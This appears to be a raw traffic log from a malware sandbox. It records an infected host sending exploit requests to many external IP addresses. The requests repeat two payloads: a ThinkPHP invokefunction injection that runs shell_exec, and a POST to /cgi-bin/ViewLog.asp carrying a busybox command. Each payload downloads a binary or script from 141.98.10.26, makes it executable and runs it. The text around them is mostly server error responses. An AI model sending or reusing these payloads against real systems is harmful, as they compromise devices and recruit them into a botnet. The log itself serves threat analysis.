Nov 22, 2023 08:39:35.000147104 CET	12729	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:39:35.400259972 CET	12845	IN	HTTP/1.1 400 Bad Request Server: JSP3/2.0.14 Date: Wed, 22 Nov 2023 07:39:35 GMT Content-Type: text/html Content-Length: 156 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 4a 53 50 33 2f 32 2e 30 2e 31 34 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>JSP3/2.0.14</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
633	192.168.2.23	40568	112.3.25.43	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:35.002912998 CET	12741	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:39:37.060908079 CET	13005	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:39:37.462913036 CET	13073	IN	HTTP/1.1 400 Bad Request Server: JSP3/2.0.14 Date: Wed, 22 Nov 2023 07:39:37 GMT Content-Type: text/html Content-Length: 156 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 4a 53 50 33 2f 32 2e 30 2e 31 34 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>JSP3/2.0.14</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
634	192.168.2.23	48192	94.122.206.56	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:35.243108034 CET	12818	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
635	192.168.2.23	38358	94.120.11.3	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:35.243180990 CET	12818	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
636	192.168.2.23	53498	94.120.249.20	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:35.243256092 CET	12819	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
637	192.168.2.23	51386	95.86.75.143	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:35.243310928 CET	12819	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
638	192.168.2.23	45806	31.28.0.212	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:35.450855017 CET	12857	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:35.658385038 CET	12865	IN	HTTP/1.1 404 Content-Type: text/html;charset=utf-8 Content-Language: en Content-Length: 431 Date: Wed, 22 Nov 2023 08:08:06 GMT Keep-Alive: timeout=5 Connection: keep-alive Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 62 6f 64 79 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 68 31 2c 20 68 32 2c 20 68 33 2c 20 62 20 7b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 68 31 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 68 32 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 68 33 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 70 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 20 61 20 7b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 7d 20 2e 6c 69 6e 65 20 7b 68 65 69 67 68 74 3a 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!doctype html><html lang="en"><head><title>HTTP Status 404 Not Found</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 404 Not Found</h1></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
639	192.168.2.23	33352	94.187.99.3	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:35.462543011 CET	12859	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
640	192.168.2.23	36464	31.207.109.158	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:35.676363945 CET	12866	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:35.897041082 CET	12871	IN	HTTP/1.1 501 Not Implemented Date: Wed, 22 Nov 2023 07:39:35 GMT Last-Modified: Wed, 22 Nov 2023 07:39:35 GMT Access-Control-Allow-Origin: * Content-Length: 54 Connection: keep-alive Content-Type: text/html Set-Cookie: id=151134746; Path=/ Data Raw: 54 68 65 20 72 65 71 75 65 73 74 65 64 20 6d 65 74 68 6f 64 20 69 73 20 6e 6f 74 20 69 6d 70 6c 65 6d 65 6e 74 65 64 20 62 79 20 74 68 69 73 20 73 65 72 76 65 72 Data Ascii: The requested method is not implemented by this server

Session ID	Source IP	Source Port	Destination IP	Destination Port
641	192.168.2.23	37602	62.29.24.217	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:35.690265894 CET	12867	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
642	192.168.2.23	33728	62.29.8.169	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:35.693562984 CET	12867	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
643	192.168.2.23	40708	31.200.30.81	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:35.694648981 CET	12868	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
644	192.168.2.23	45762	95.220.115.180	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:35.889117002 CET	12870	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:36.131510019 CET	12883	IN	HTTP/1.1 Data Raw: Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port
645	192.168.2.23	43242	94.46.168.17	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:36.458833933 CET	12982	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:37.060889006 CET	13004	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:37.259051085 CET	13030	IN	HTTP/1.1 400 Bad Request Date: Wed, 22 Nov 2023 07:39:37 GMT Server: Apache Accept-Ranges: bytes Connection: close Content-Type: text/html Data Raw: 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 43 43 43 43 43 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 63 6f 64 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 35 30 30 25 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 35 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 63 74 2d Data Ascii: <!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>400 Bad Request</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CCCCCC; } .status-code { font-size: 500%; } .status-reason { font-size: 250%; display: block; } .contact-

Session ID	Source IP	Source Port	Destination IP	Destination Port
646	192.168.2.23	32998	95.164.199.116	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:36.508409977 CET	12983	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:39:36.608603001 CET	12985	IN	HTTP/1.1 400 Bad Request Date: Wed, 22 Nov 2023 07:39:36 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 301 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 32 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 32 37 2e 30 2e 31 2e 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.52 (Ubuntu) Server at 127.0.1.1 Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
647	192.168.2.23	35474	95.100.244.192	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:36.582701921 CET	12984	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:39:36.757266045 CET	12990	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 258 Expires: Wed, 22 Nov 2023 07:39:36 GMT Date: Wed, 22 Nov 2023 07:39:36 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 33 66 31 61 37 62 35 63 26 23 34 36 3b 31 37 30 30 36 33 38 37 37 36 26 23 34 36 3b 34 32 61 62 31 32 31 32 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.3f1a7b5c.1700638776.42ab1212</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
648	192.168.2.23	42448	95.101.107.99	80

Timestamp	kBytes transferred	Direction	Data
